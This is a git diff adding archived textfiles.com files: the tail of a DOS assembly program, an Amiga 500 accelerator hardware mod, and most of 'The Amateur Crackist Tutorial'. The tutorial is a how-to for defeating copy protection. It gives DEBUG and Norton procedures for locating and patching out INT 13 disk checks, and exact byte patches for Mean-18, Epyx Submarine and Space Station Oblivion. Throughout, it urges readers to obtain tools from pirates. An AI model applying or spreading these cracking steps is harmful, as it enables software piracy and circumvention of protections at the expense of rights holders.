repeat + mov bl,al ;convert command byte to + xor bh,bh ; word index in BX + shl bx,1 ; + call [bx+Function_Table] ;execute command once + pop ax ;get back the count + dec al ;see if it's time to stop + je DoneWithRep ;jump if done all repetitions + pop si ;get back the pointer to the + ; command to repeat, and + jmp NextRep ; do it again +DoneWithRep: + pop ax ;clear pointer to command to + ; repeat from stack, leave + ; SI pointing to the next + ; command + ret +; +Interp endp +; +; Outputs a text character at the present cursor coordinates, +; then advances the cursor coordinates according to the +; X and Y increments. +; +OutputCharacter proc near + push ax ;save the character to output + mov ah,2 ;set the cursor position + mov dx,word ptr [Cursor_X_Coordinate] + xor bx,bx ;page 0 + int 10h ;use BIOS to set cursor position + pop ax ;restore character to be output + mov ah,9 ;write character BIOS function + mov bl,[Character_Attribute] ;set attribute + mov cx,1 ;write just one character + int 10h ;use BIOS to output character + ;advance X & Y coordinates + mov ax,word ptr [Cursor_X_Coordinate] ;both x & y Incs + add al,[Cursor_X_Increment] ; can be negative + add ah,[Cursor_Y_Increment] ; so must add bytes + ; separately + mov word ptr [Cursor_X_Coordinate],ax ;store new X & Y + ; coordinates + ret +OutputCharacter endp +; +_TEXT ends + end Start ;start execution at Start + + + + + \ No newline at end of file diff --git a/textfiles.com/computers/accel.txt b/textfiles.com/computers/accel.txt new file mode 100644 index 00000000..9e9cfd55 --- /dev/null +++ b/textfiles.com/computers/accel.txt @@ -0,0 +1,84 @@ + Amiga 500 processor accelerator project + by Leslie Ayling + p.o. box 334 + GLEBE 2037 + + Welcome once again to cheapskates corner, where we try and buy the +world for a song. This time around we shall increase the speed of the +processor to just over 14Mhz, double the standard speed, +for under $25 !!!! + + You will need the following - + +1. an MC68000p12A 16MHz processor. These are available in Sydney from VSI + electronics, 16 DICKSON ave ARTARMON 2064 ph (02)4398622 cost is + $18.90 plus tax ($22.68 tax inc.) +2. a 74F74 D type flip flop. Geoff wood at Lane Cove or Rod Irving + should keep them. +3. a few short lengths of hook-up wire. +4. a SPDT switch. + +Refer to the accompanying circuit diagram +Note: Keep the leads to the switch as SHORT as possible. +The circuit is relatively straight forward. the 74F74 is wired as a +positive edge triggered divide by two circuit, which provides the alternate +clock frequency of 14.18Mhz approxiamately. The old 68000 8Mhz processor +is removed and replaced with the 16Mhz version which has is clock pin (15) +bent out horizontally so we can connect our new circuitry to it. +The SPDT switch either connects the normal 7Mhz signal or the new 14Mhz +signal to the 68000's clock input. + +The switch can be changed while the machine is on, however it will simply +lock up. Just reset as usual from the keyboard once you have changed speed. + +I have a revision 5 board with new 1.3 roms which cope with the new speed +quite happily. Using the program CRAMDEN-SI from MEGADISC 10 to compare +the difference the mod makes : + +The standard position gives- + +performance relative to amiga 1000 : 1.0 +performance relative to ibm pc/xt : 3.2 + +On high speed the performance is- + +performance relative to amiga 1000 : 1.7 +performance relative to ibm pc/xt : 5.2 + +so roughly a 70% increase in performance. +Even though the clock speed is doubled to the processor, the performance +dosen't increase to 2.0 because the agnus and the other support chips are +still running at the same speed as before thus holding the processor up +for a slightly higher percentage of the total time than before. + +This mod basically gives the same capability as the CMI accelerator board +priced at $399 in sydney, with the exception that it isn't software +controlled. However when it's only costing 1/16th the price one cant +really complain!!. + +If you have any queries or would like the mod installed in your machine, +either contact me direct or via Megadisc. + +The machine should work on the 1000 and 2000 however the pin numbers may +be different.I suggest you compare the a500 schematics with that of your +machine and make note of the differences. + +Hope this is of some help...........regards Leslie Ayling. + +#addendum# +One machine this mod was carried out on had trouble with the one of the +disk drives at high speed. It appeared to be trying to step the head of +the internal drive faster than the drive could physically move and +refused to boot.When I connected a drive with a 5ms track-track access +time and booted off of it the problem dissappeared. +I have a patch for this problem for normal DOS disks to slow down the +step rate which sits in the boot sector.It may be a problem however for +protected software or non-standard boot sector type programs. +Don't despair however the patch is very small and should fit in +somewhere anyway.Just drop me a line. If your machine exhibits the +problem, the patch disk is available DIRECT from me with various usefull +disk speedup utils and a Trackdisk step-rate alteration program, plus +loads of other priceless information on gurus, reset program flow, +diagnostics all on an ARP1.3 system disk for the princely sum of $5 !! +There should be no problem with HARD disks however if anyone encounters +any please let me know........thanks. diff --git a/textfiles.com/computers/act-13.txt b/textfiles.com/computers/act-13.txt new file mode 100644 index 00000000..ce24a3a2 --- /dev/null +++ b/textfiles.com/computers/act-13.txt @@ -0,0 +1,1696 @@ + + + + + + + + + VOL 1 NUM 1 + + + + + The Amatuer Crackist Tutorial + Version 1.3 + By + Specular Vision + + + + + + Special Thanks to: + Mr. Transistor + Ironman + The Grand Elusion + Banzai Buckaroo + + + + + Another fine PTL Production + Call The Myth Inc. BBS + Table of Contents: + ------------------ (Page Numbers will be aprox. until + final version is finished) + i. Table of Contents 2 + + ii. Introduction 3 + + I. How to Crack 4 + Debugging DOS 4 + Cracking on the IBM PC Part 1 7 + Cracking on the IBM PC Part 2 11 + + II. Example Cracks 14 + Mean-18 by Accolade 14 + Submarine by Eypx 18 + Space Station Oblivion by Eypx 22 + + III. Removing Doc Check Questions 23 + F-15 Strike Eagle by MicroProse 23 + Battlehawks 1945 by Lucasfilms 25 + Yeager's AFT by Electronic Arts 26 + + IV. Cracking Self Booters 27 + Disk Basics + Victory Road by Data East 27 + MS-Flight Simulator (Ver 2.x) 30 + + V. Creating Title Screens 33 + + VI. Appendix 35 + A - Interrupt Tables 36 + (This will be an add-on file) + + + + + + + + + + + + + + + + + + + + + + + + 2 + Introduction: + ------------- + + Due to the current lack of Crackers, and also keeping in mind + the time it took me to learn the basics of cracking, I de- + cided to put this tutorial together. I will include many + files which I have found helpful in my many cracking endeav- + ors. It also has comments that I have included to make it + easier to understand. + + + + Comments Key: + ------------- + + Comments in the following material will be made by one of the + following and the lines that enclose the comments show who + made the comment. + + Specular Vision = ------------- + Mr. Transistor = +++++++++++++ + Ironman = ||||||||||||| + + + Special thanks to Mr. Transistor, for coming out of "Retire- + ment" to help compose this document. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 3 + Chapter I How to Crack + + + ------------------------------------------------------------- + Let's start with a simple introduction to patching a program + using the DOS DEBUG program. The following article will in- + troduce you to the basic ideas and concepts of looking for a + certain area of a program and making a patch to it. + ------------------------------------------------------------- + + + By: Charles Petzold / Specular Vision + Title: Case Study: A Colorful CLS + + This article originally appeared in the Oct. 14,1986 Issue + of PC Magazine (Vol 15. Num 17.). Written by Charles Petzold. + + The hardest part of patching existing programs is determin- + ing where the patch should go. You really have to make an + intelligent guess about the functioning of the program. + + As an example, let's attempt to modify COMMAND.COM so that + is colors the screen on a CLS command. As with any type of + patch try it out on a copy and NOT the original. + + First, think about what we should look for. CLS is differ- + ent from all the other DOS internal Commands, It is the only + internal command that does something to the screen other than + just write to it with simple teletype output. CLS blanks the + screen and homes the cursor. Since it can't do this through + DOS Calls (unless ANSI.SYS is loaded), it is probably calling + the BIOS Directly. The BIOS Interrupt 10h call controls the + video, and so the CLS command probably uses several INT 10h + instructions. The machine code for INT 10h is CD 10. + + (While this same method will work under any version of + PC-DOS, Version 2.0 and later, the addresses I'll be using + are from PC-DOS 3.1. Other versions of PC-DOS(or MS-DOS) will + have different addresses; you should be absolutely certain + that you're using the correct addresses.) + + Load COMMAND.COM into DEBUG: + + DEBUG COMMAND.COM + + and do an R (Registers) command. The size of COMMAND.COM is + in register CX. For DOS 3.1's COMMAND.COM, this value is + 5AAA. + + Now do Search command to look for the CD 10 bytes: + + S 100 L 5AAA CD 10 + + You'll get a list of six addresses, all clustered close to- + + 4 + gether. The first one is 261D. You can now pick an address a + little before that (to see what the first call is doing) and + start disassembling: + + U 261B + + The first INT 10 has AH set to 0F which is a Current Video + State call. The code checks if the returned value of AL + (Which is the video mode) is less than 3 or equal to 7. + These are the text modes. If so, it branches to 262C. If + not, it just resets the video mode with another INT 10 at ad- + dress 2629. + + At 262C, the code first sets the border black (the INT 10 + at 2630), then does another Current Video State call (at + 2634) to get the screen width in register AH. It uses infor- + mation from this call to set DX equal to the bottom right row + and column. It then clears the screen by scrolling the en- + tire screen up with another INT 10 (at 2645), and then sets + the cursor to the zeroth row and zeroth column with the final + INT 10 (at 264D). + + When it scrolls the whole screen, the zero value in AL ac- + tually means blank the screen, the value of BH is the at- + tribute to be used on the blanked area. In an unmodified + COMMAND.COM, BH is set to 7 (Which is white on black) by the + following statement at address 2640: + + MOV BX,0700 + + If you prefer a yellow-on-blue attribute (1E), you can + change this line by going into Assemble mode by entering: + + A + + then entering + + MOV BX,1E00 + + and exiting Assemble mode by entering a blank line. + + Now you can save the modified file: + + W + + and quit DEBUG: + + Q + + When you load the new version of COMMAND.COM (and you can + do so without rebooting by just entering: + + COMMAND + + + 5 + on the DOS command level), a CLS will turn the screen blue + and display characters as yellow. + + If it doesn't or if anything you type shows up as white on + black, that probably means you have ANSI.SYS loaded. If you + use ANSI.SYS, you don't have to make this patch but can in- + stead use the prompt command for coloring the screen. + + END. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 6 + ------------------------------------------------------------- + That was just one section of a very large article that helped + me to get started. Next we'll look at two other articles, + both written by Buckaroo Banzi. These two articles CRACK-1 + and CRACK-2 give you an introduction to the different copy + protection schemes used on IBM PC's, and how to find and by- + pass them. + ------------------------------------------------------------- + + + + By: Buckaroo Banzai + Title: Cracking On the IBM PC Part I + + + Introduction + ------------ + For years, I have seen cracking tutorials for the APPLE + computers, but never have I seen one for the PC. I have de- + cided to try to write this series to help that pirate move up + a level to a crackest. + + In this part, I will cover what happens with INT 13 and how + most copy protection schemes will use it. I strongly suggest + a knowledge of Assembler (M/L) and how to use DEBUG. These + will be an important figure in cracking anything. + + + INT-13 - An overview + -------------------- + + Many copy protection schemes use the disk interrupt + (INT-13). INT-13 is often use to either try to read in a il- + legally formatted track/sector or to write/format a + track/sector that has been damaged in some way. + + INT-13 is called like any normal interrupt with the assem- + bler command INT 13 (CD 13). [AH] is used to select which + command to be used, with most of the other registers used for + data. + + INT-13 Cracking College + ----------------------- + Although, INT-13 is used in almost all protection schemes, + the easiest to crack is the DOS file. Now the protected pro- + gram might use INT-13 to load some other data from a normal + track/sector on a disk, so it is important to determine which + tracks/sectors are important to the protection scheme. I + have found the best way to do this is to use LOCKSMITH/pc + (what, you don't have LS. Contact your local pirate for it.) + + Use LS to analyze the diskette. Write down any track/sector + that seems abnormal. These track are must likely are part of + the protection routine. Now, we must enter debug. Load in + + 7 + the file execute a search for CD 13. Record any address + show. + + If no address are picked up, this mean 1 or 2 things, the + program is not copy protected (right...) or that the check is + in an other part of the program not yet loaded. The latter + being a real hassle to find, so I'll cover it in part II. + There is another choice. The CD 13 might be hidden in self + changing code. Here is what a sector of hidden code might + look like + + -U CS:0000 + 1B00:0000 31DB XOR BX,BX + 1B00:0002 8EDB MOV DS,BX + 1B00:0004 BB0D00 MOV BX,000D + 1B00:0007 8A07 MOV AL,[BX] + 1B00:0009 3412 XOR AL,12 + 1B00:000B 8807 MOV [BX],AL + 1B00:000D DF13 FIST WORD... + + In this section of code, [AL] is set to DF at location + 1B00:0007. When you XOR DF and 12, you would get a CD(hex) + for the INT opcode which is placed right next to a 13 ie, + giving you CD13 or INT-13. This type of code can't and will + not be found using debug's [S]earch command. + + + + Finding Hidden INT-13s + ---------------------- + + The way I find best to find hidden INT-13s, is to use a + program called PC-WATCH (TRAP13 works well also). This pro- + gram traps the interrupts and will print where they were + called from. Once running this, you can just disassemble + around the address until you find code that look like it is + setting up the disk interrupt. + + An other way to decode the INT-13 is to use debug's [G]o + command. Just set a breakpoint at the address give by + PC-WATCH (both programs give the return address). Ie, -G + CS:000F (see code above). When debug stops, you will have + encoded not only the INT-13 but anything else leading up to + it. + + + What to do once you find INT-13 + ------------------------------- + + Once you find the INT-13, the hard part for the most part + is over. All that is left to do is to fool the computer in + to thinking the protection has been found. To find out what + the computer is looking for, examine the code right after the + INT-13. Look for any branches having to do with the + + 8 + CARRYFLAG or any CMP to the AH register. If a JNE or JC + (etc) occurs, then [U]nassembe the address listed with the + jump. If it is a CMP then just read on. + + Here you must decide if the program was looking for a pro- + tected track or just a normal track. If it has a CMP AH,0 + and it has read in a protected track, it can be assumed that + it was looking to see if the program had successfully com- + plete the READ/FORMAT of that track and that the disk had + been copied thus JMPing back to DOS (usually). If this is + the case, Just NOP the bytes for the CMP and the correspond- + ing JMP. + + If the program just checked for the carry flag to be set, + and it isn't, then the program usually assumes that the disk + has been copied. Examine the following code + + INT 13 <-- Read in the Sector + JC 1B00 <-- Protection found + INT 19 <-- Reboot + 1B00 (rest of program) + + The program carries out the INT and find an error (the il- + legally formatted sector) so the carry flag is set. The com- + puter, at the next instruction, see that the carry flag is + set and know that the protection has not been breached. In + this case, to fool the computer, just change the "JC 1B00" to + a "JMP 1B00" thus defeating the protection scheme. + + NOTE: the PROTECTION ROUTINE might be found in more than just + 1 part of the program + + + Handling EXE files + ------------------ + + As we all know, Debug can read .EXE files but cannot write + them. To get around this, load and go about cracking the + program as usual. When the protection scheme has been found + and tested, record (use the debug [D]ump command) to save + & + - 10 bytes of the code around the INT 13. Exit back to dos + and rename the file to a .ZAP (any extension but .EXE will + do) and reloading with debug. Search the program for the 20+ + bytes surrounding the code and record the address found. + Then just load this section and edit it like normal. Save + the file and exit back to dos. Rename it back to the .EXE + file and it should be cracked. + + ***NOTE: Sometimes you have to play around with it for a + while to make it work. + + + + + + 9 + DISK I/O (INT-13) + ----------------- + This interrupt uses the AH resister to select the function + to be used. Here is a chart describing the interrupt. + + AH=0 Reset Disk + AH=1 Read the Status of the Disk + system in to AL + + AL Error + ---------------------------- + 00 - Successful + 01 - Bad command given to INT + *02 - Address mark not found + 03 - write attempted on write protected disk + *04 - request sector not found + 08 - DMA overrun + 09 - attempt to cross DMA boundary + *10 - bad CRC on disk read + 20 - controller has failed + 40 - seek operation failed + 80 - attachment failed + (* denotes most used in copy protection) + AH=2 Read Sectors + + input + DL = Drive number (0-3) + DH = Head number (0or1) + CH = Track number + CL = Sector number + AL = # of sectors to read + ES:BX = load address + output + AH =error number (see above) + [Carry Flag Set] + AL = # of sectors read + + AH=3 Write (params. as above) + AH=4 Verify (params. as above -ES:BX) + AH=5 Format (params. as above -CL,AL + ES:BX points to format + Table) + + ------------------------------------------------------------ + For more information on INT-13 refer to appendix A. + ------------------------------------------------------------ + + END. + + + + + + + + 10 + ------------------------------------------------------------- + In part II, Buck cover's Calls to INT-13 and INT-13 that are + located in different overlays of the program. This is a + method that is used often. + ------------------------------------------------------------- + + + Cracking Tutorial II. + + By: Buckaroo Banzai + Title: Cracking On the IBM PC Part II + + + Introduction + ------------ + + OK guys, you now passed out of Copy Class 101 (dos files) + and have this great new game with overlays. How do I crack + this one. You scanned the entire .EXE file for the CD 13 and + it's nowhere. Where can it be you ask yourself. + + In part II, I'll cover cracking Overlays and the use of + locksmith in cracking. If you haven't read part I, then I + suggest you do so. The 2 files go together. + + + Looking for Overlays + -------------------- + So, you cant find CD 13 in the .EXE file, well, it can mean + 4 things. + + 1: The .EXE (though it is mostly .COM) file is just a + loader for the main file. + + 2: The .EXE file loads in an overlay. + + 3: The CD 13 is encrypted &/or hidden in the .EXE file. + + 4: Your looking at the WRONG file. + + + I won't discuss case 1 (or at least no here) because so + many UNP files are devoted to PROLOCK and SOFTGUARD, if you + can't figure it out with them, your stupid. + + If you have case 3, use the technique in part I and restart + from the beginning. And if you have case 4, shoot your self. + + You know the program uses overlays but don't see and on + disk? Try looking at the disk with good old Norton's. Any + hidden files are probably the overlays. These are the ones + we are after. If you still can't find them, use PC-WATCH + (this program is a must!!! For all crackists. Traps ALL in- + terrupts). + + 11 + + Using PC-Watch to Find Overlays + ------------------------------- + Start up PC-Watch and EXCLUDE everything in the left Col.. + Search the right Col. until you find DOS21 - OpnFile and + select it. + + Now run the program to be cracked. + Play the game until the protection is checked. + Examine you PCWatch output to see what file was loaded + right before it. + This probably is the one holding the check. + If not, go through all the files. + + + You Have Found the Overlays + --------------------------- + Great, now just crack the overlay as if it was a DOS file. + You don't need to worry about .EXE file, debug can write an + overlay file. Part I explains the basics of cracking. I + suggest that you keep a backup copy of the overlay so if you + mess up, and you will, you can recover quickly. Ah, and you + thought cracking with overlays was going to be hard. + + + + Locksmith and Cracking + ---------------------- + + The copy/disk utility program Locksmith by AlphaLogic is a + great tool in cracking. It's analyzing ability is great for + determining what and where the protection is. + + I find it useful, before I even start cracking, to analyze + the protected disk to find and id it's protection. This + helps in 2 ways. First, it helps you to know what to do in + order to fake out the protection. Second, it helps you to + find what the program is looking for. + + I suggest that you get locksmith if you don't already have + it. Check your local pirate board for the program. I also + suggest getting PC-Watch and Norton Utilities 3.1.(Now 4.1) + All of these program have many uses in the cracking world. + + END. + + + + + + + + + + + 12 + Chapter II Example Cracks + + + + ------------------------------------------------------------- + OK, now let's put some of this information into practice by + examining a few cracks of some common programs. First we'll + look at a Crack for Mean-18 Golf by Accolade. Accolade has + been one of those companies that has a fervent belief in Copy + Protection. + ------------------------------------------------------------- + + + + + Title: MEAN-18 UnProtect For CGA/EGA Version + + + This crack works by eliminating the code that tests for known + bad sectors on the original diskette to see if it is the + genuine article or an illegal copy. The code begins with an + INT 13 (CD 13 HEX), a DOS BIOS disk service routine followed + a few bytes later by another INT 13 instruction. The program + then checks the returned value for the bit configuration that + signifies the bad sectors and, if all is as expected, contin- + ues on with program execution. + + The code that needs to be patched is in the GOLF.EXE file and + in the ARCH.EXE file. It is identical in both files and lies + near the end of each file. + + In the following steps, you'll locate the start of the test + code and patch it by replacing it with NOP instructions (HEX + 90). The method described uses the DOS DEBUG utility but + Norton's Utility (NU) works too. + + Copy all of the files from the MEAN-18 disk onto a fresh + floppy using the DOS COPY command and place your original + diskette out of harm's way. + + Assuming DEBUG is in the A: drive and the floppy containing + the files to be unlocked is in the B: drive , proceed as fol- + lows: + + First REName the GOLF.EXE file so it has a different + EXTension other than .EXE. + + REN GOLF.EXE GOLF.DEB + + + Next load the file GOLF.DEB into DEBUG and displays the "-" + DEBUG prompt. + + A:> DEBUG B:GOLF.EXE + + 13 + Search for the beginning of the code to be patched by typing: + + + - S CS:100 FFFF CD 13 + + Searches the file for the two byte INT 13 instruction. If + all goes well, two addresses should appear on the screen. + + XXXX:019C + XXXX:01A8 + + XXXX indicates that the numbers preceeding the ":" vary from + system to system but the numbers following the ":" are the + same on all systems. + + The next step is to use the "U" command as indicated to + un-assemble a few bytes in order to verify your position in + the file) + + - U CS:019C + + (Un-assembles 32 bytes of code. Verify the following se- + quence of instructions: + + INT 13 + JB 01E9 + MOV AL,[BX+01FF] + PUSH AX + MOV AX,0201 + INT 13 + POP AX + JB 01E9 + CMP AL,F7 + JNZ 01B5 + + These are the instructions you'll be patching out in the fol- + lowing step) + + - A CS:019C + + This command assembles the new instructions you enter at the + keyboard into the addresses shown. Beginning at CS:019C, and + for the next 21 bytes, ending with and including CS:01B0, en- + ter the no op command "NOP" (90h) followed by a or + . Just hit at address XXXX:01B1 to end the + assemble command.) + + XXXX:019C NOP + XXXX:019D NOP + . + . + . + XXXX:01AE NOP + XXXX:01AF NOP + + 14 + XXXX:01B0 NOP + XXXX:01B1 + + This just wipes out the section of code containing the INT 13 + check. + + Now do a HEX dump and verify that bytes 019C through 01B0 + have been set to 90 HEX. + + - D CS:019C + + If they have, write the patched file to the disk as follows) + + - W + + This writes the patched file back to the + disk where it can be run by typing GOLF just as before but + now, it can be run from any drive, including the hard + drive) + + Now just [Q]uit or exit back to DOS. This command can be ex- + ecuted at any "-" DEBUG prompt if you get lost. No modifica- + tion will be made to the file on the disk until you issue the + "W" command. + + - Q + + The process is the same for the ARCH.EXE file but because it + is a different length, the segment address, (XXXX part of the + address), will be different. You should find the first INT + 13 instruction at address XXXX:019C and the second one at + XXXX:01A8 as before. + + You will again be patching 21 bytes and you will start with + 019C and end with 01B0 as before. After doing the HEX dump + starting at address 019C, you again write the file back to + the disk with a "W" command then "Q" uit. + + Norton's utilities can also be used to make this patch. Be- + gin by searcing the GOLF.EXE or ARCH.EXE files for the two + byte combination CD 13 (remember to enter these as HEX + bytes). Once located, change the 21 bytes, starting with the + first "CD" byte, to 90 (a NOP instruction). As a check that + you are in the right place, the byte sequence in both files + is CD 13 72 49 8A 87 FF 01 50 B8 01 02 CD 13 58 72 3C 3C F7 + 75 04. After modifying the bytes, write the modified file + back to the disk. It can then be run from any drive. + + END. + + + + + + + 15 + ------------------------------------------------------------ + That was the first the tutorial cracks, here's another crack + based on the same ideas but using Norton's Utilities instead. + The following is an unprotect method for Eypx Submarine. + Eypx is another one of those companies bent on protecting the + world. + ------------------------------------------------------------ + + + By: Assembler Magic + Title: EPYX Submarine Unprotect + + + You will only need to make one modification to the main + executable program of Submarine, SUB.EXE. I will assume that + your computer has a hard disk and that you have a path to + DOS. It's time to fire up DEBUG as follows: + + DEBUG SUB.EXE + + The computer should respond with a "-" prompt. Now look at + the registers, just to make sure everything came up okay. + Type the letter "R" immediately after the prompt. The com- + puter should respond with a few lines of info as follows: + + AX=0000 BX=0001 CX=6103 DX=0000 SP=0080 BP=0000 SI=0000 + DI=0000 DS=12CE ES=12CE SS=37B2 CS=27FC IP=0010 NV UP EI PL + NZ NA PO NC + 27FC:0010 8CC0 MOV AX,ES + - + + Note the value of CS is "27FC". That is the hexadecimal + segment address for the beginning of the program code in your + computer's memory. It is highly probable that the value you + see for CS will differ from mine. Whatever it is, write it + down. Also, the values you see for DS, ES and SS will almost + certainly differ from mine and should not cause you concern. + The other registers should show the same values mine do, and + the flags should start with the same values. + + Next, we will do a search for Interrupt 13's. These are + BIOS (not DOS) Interrupts built into the program which are + used to ensure that the original disk is being used to run + the program. The whole key to this unprotect scheme is to by- + pass these Interrupts in the program code. The tricky part + of this unprotect is to find them! They are not in the seg- + ment of program code starting at the value of CS equal to + "27FC". They are closer to the beginning of the program in + memory. Easy enough! Reset the value of CS to equal the + value of DS as follows; type immediately after Debug's "-" + prompt: + + RCS + + + 16 + Debug will prompt you for the new value of CS with: + + CS:27FC: + + You respond by typing the value of DS you saw when you + dumped the registers the first time. For example, I typed + "12CE". The value you type will be different. Debug + will again respond with the "-" prompt which means we are + ready to do our search. Type in the following after the "-" + prompt: + + S CS:0 FFFF CD 13 + + The computer should respond with three lines of information + which are the addresses of the three Interrupt 13 calls built + into the program. The first four digits are the segment ad- + dress and will equal to the value of CS you have just set. + The second four digits following the colon are the offset ad- + dresses which are of primary interest to us. On my machine + they came back as follows: + + 12CE:4307 + 12CE:431F + 12CE:4335 + + The segment addresses will be identical and the three off- + set addresses should all be relatively close together. Now + look at the first offset address. (As you can see, mine was + "4307".) Write it down. Now we do a bit of Unassembly. + + Type "U4307" which is the letter "U", followed immedi- + ately (with no blank spaces) by whatever your first offset + address turned out to be, followed by a carriage return. If + you are not familiar with unassembled machine code, it will + look like lines of gibberish as follows: + + 12CE:4307 CD13 INT 13 + 12CE:4309 4F DEC DI + 12CE:430A 744C JZ 4358 + . + . + 12CE:431F CD13 INT 13 + 12CE:4321 4F DEC DI + . + . + 12CE:4324 BF0400 MOV DI,0004 + 12CE:4326 B80102 MOV AX,0201 + + In my computer, Unassemble will automatically output 16 + lines of code to the screen. Yours may differ. Note, in the + abbreviated list I have shown above, the addresses at the be- + ginning of the two lines which contain the Interrupt 13's + (INT 13) correspond to the first two addresses we found in + our search. Now we continue the unassemble, and here comes + + 17 + another tricky part. Just type in "U" after the "-" + prompt. + + You'll get sixteen more lines of code with the third Inter- + rupt 13 on a line which begins with the address (CS):4335 if + you have the same version of Submarine as I do. It's not + terribly important to this exercise, but it will at + least show you that things are proceeding okay. Now type in + "U" again after the prompt. You are now looking for + three key lines of code. On my program they appear as fol- + lows: + + 12CE:4335 07 POP ES + 12CE:4356 5D POP BP + 12CE:4357 CB RETF + + The true key is the instruction "POP ES". This instruction + begins the normal return sequence after the program has ex- + ecuted its Interrupt 13 instructions and accompanying checks. + If Debug on your machine prints fewer than 16 lines of code + at a shot, you may have to type in "U" more than twice at the + "-" to find these instructions. (If you haven't found any of + this stuff, either get help on the use of Debug or go back to + using your diskette version!) Write down the offset address + of the "POP ES" instruction; the four digits following the + colon, which in my example is "4354". You're well on your + way now, so please persevere. + + The next step is to modify the program to JUMP around the + code which executes the Interrupt 13's and go immediately to + the instruction which begins the normal return sequence + (again, it's the "POP ES". Type in the following instruc- + tions carefully: + + A4307 + + This first bit tells Debug that new Assembler code will be + inserted at the address of the first Interrupt 13. If your + first Interrupt 13 is at an address other that "4307", use + the correct address, not mine. The computer will prompt you + with the address: + + 12CE:4307 + + After which you will immediately type: + + JMP 4354 + + This instruction jumps the program immediately to the normal + return code instructions. Again, at the risk of being redun- + dant, if your "POP ES" instruction is at a different address, + use that address, not "4354"! + + The computer will prompt you with the address of the next in- + + 18 + struction if all went well. MAKE SURE you just hit the + carriage return at this point. Debug will then return the + familiar "-" prompt. + + Now it's time to examine your handiwork. Let's do the + unassemble again starting at the address of what had been the + first Interrupt 13 instruction, but which is now the Jump in- + struction. Type in "U4307" or "U" followed by the appro- + priate address and a carriage return. The first line begin- + ning with the address should appear as follows: + + 12CE:4307 EB4B JMP 4354 + + The key here is the four bytes immediately following the ad- + dress. In my example they are "EB4B". Yours may not be. + But, they are VERY IMPORTANT because they represent the ac- + tual machine code which is the Jump instruction. WRITE THESE + FOUR BYTES DOWN AND MAKE SURE THEY ARE CORRECT. + + Now if you want to have some fun before we go on, reset + register CS to its original value by first typing "RCS" + at the "-" prompt. Then type in the original value of CS + that I asked you to write down. Using my example, I typed + "27FC". Next, you will type "G" after the "-" prompt + which means GO! If all went well, SUB should run at this + point. At least it will if you put all of the Submarine + files onto the diskette or into the hard disk subdirectory + where youre working. If it didn't run, you may have made an + error. Check through what you have done. + + Don't give up at this point if it does not run. Your version + of Debug may simply have not tolerated our shenanigans. When + you are done playing, quit Submarine ("Alt-Q") and type a + "Q" after the Debug prompt "-" appears. + + Now comes the tough part. I can't walk you through this + phase in complete detail, because you may be using one of + several programs available to modify the contents of SUB.EXE. + Debug is not the way to go, because it can't write out .EXE + files, only .COM files. + + ------------------------------------------------------------- + Note: Another method of doing this is to REName the SUB.EXE + file so it has a different extension other than .EXE before + you enter DEBUG. That way after you've made the change you + can then [W]rite then changes out to the file right in DEBUG. + Then one drawback is that you can't run the program in DEBUG + once you've changed the name. + ------------------------------------------------------------- + + You have to get into your sector modification package (NORTON + works good) and work on the SUB.EXE file on your new diskette + or your hard disk. Remember, I warned you that doing this on + your hard disk is dangerous if you are not fully aware of + + 19 + what you are doing. So, IF YOU MESS UP, it's YOUR OWN FAULT! + + You are looking for the first occurrence of an Interrupt 13 + (the "CD 13") using the search facility in your program. If + you don't have the ability to search for the two-byte hexa- + decimal code "CD 13" directly, then you will have to manually + search. + + ------------------------------------------------------------- + Note: Norton 4.x now has a search utility. When you get to + the point of typing in the search text, just press the TAB + key, and you can type in the actual hexadecimal code "CD 13". + ------------------------------------------------------------- + + Start at the beginning of SUB.EXE and proceed. Again, you + want to find the first of the three (first from the beginning + of the program). + + I will give you a hint. I found it in NORTON at location + 4407 hexadecimal which is location 17,415 decimal in the + SUB.EXE program file. DOS standard sectors are 512 decimal + bytes. Replace the two bytes "CD 13" with the "EB 4B" or + whatever your Jump instruction turned out to be. Write or + save the modified file. + + That's ALL there is to modifying SUB.EXE. You can go ahead + and execute your program. If you have followed my instruc- + tions, it should run fine. Get help if it doesn't. Now, you + should be all set. You can load onto your hard disk, if you + haven't already. You can run it from a RAM disk using a BAT + file if you really want it to hum. Or, if you have the fa- + cilities, you can copy it from 5-1/4" floppy to 3-1/2" dis- + kette and run it on machines which accept that medium if you + upgrade to a new computer. + + END. + + + + + + + + + + + + + + + + + + + + 20 + ------------------------------------------------------------- + Now let's take a look at a newer crack on the program, Space + Station Oblivion by Eypx. At a first [S]earch with Debug and + Norton's Utility no CD 13's could be found, and yet it was + using them... So a different approach had to be taken... + ------------------------------------------------------------- + + + By: PTL + Title: Space Station Oblivion Crack + + + First of all, you must determine which file the INT 13's are + in, in this case it had to be the file OBLIVION.EXE since it + was the main program and probably contained the INT 13's. So + then rename it to a different EXTension and load it into De- + bug. + + Then do a [S]earch for INT 13's. + + -S 100 FFFF CD 13 + + Which will promptly turned up nothing. Hmmm... + + Next you might decide that, maybe, the code was modifying it- + self. So quit from Debug and load up PC-Watch, include all + the INT 13 Calls. For those of you not familiar with + PC-Watch, it is a memory resident program that can be set to + look for any type of BIOS call. When that call is made + PC-Watch prints to the screen the contents of all the regis- + ters and the current memory location that the call was made + from. + + After PC-Watch is initialized, then run the OBLIVION.EXE file + from the hard disk, leaving the floppy drive door open, and + sure enough, when the red light comes on in the diskette + drive, PC-Watch will report the address's of some INT 13 + calls. Which you should then write down. + + From there, quit the game, reboot, (To dump PC-Watch from + memory) and load the OBLIVION.EXE into Debug and issue a [G]o + command with a breakpoint. What address should you use for a + breakpoint? You guessed it, the same address PC-Watch gives + you. + + Well, it locked up did'nt it? Which is quite common in this + line of work so don't let that discourage you. So next re- + loaded it into debug and this time [U]nassemble the address + that you got from PC-Watch. But instead of finding the INT + 13's you'll find harmless INT 21's. + + Hmm... could it be that the program was converting the CD + 21's to CD 13's during the run? Well, to test the idea as- + semble an INT 20 (Program Terminate) right after the first + + 21 + INT 21. Then I run the program, and yes immediately after the + red light comes on the drive, the program will terminate nor- + mally. + + Then [U]nassemble that same area of memory, and low and be- + hold, some of the INT 21's have magically turned into INT + 13's. How clever... + + So, then it is just a matter of locating the address of the + routine that it jumped (JMP) to if the correct disk was found + in drive A:. Once you have that address, just go to the + start of all this nonsense and [A]ssemble a JMP XXXX command. + Where XXXX was the address to jump to if the original disk + was in drive A:. + + Then just [W]rite the file back out to the disk and [Q]uit + debug, and then REName the file back to OBLIVION.EXE + afterwhich it should work fine. + + + END. + + 22 + Chapter III 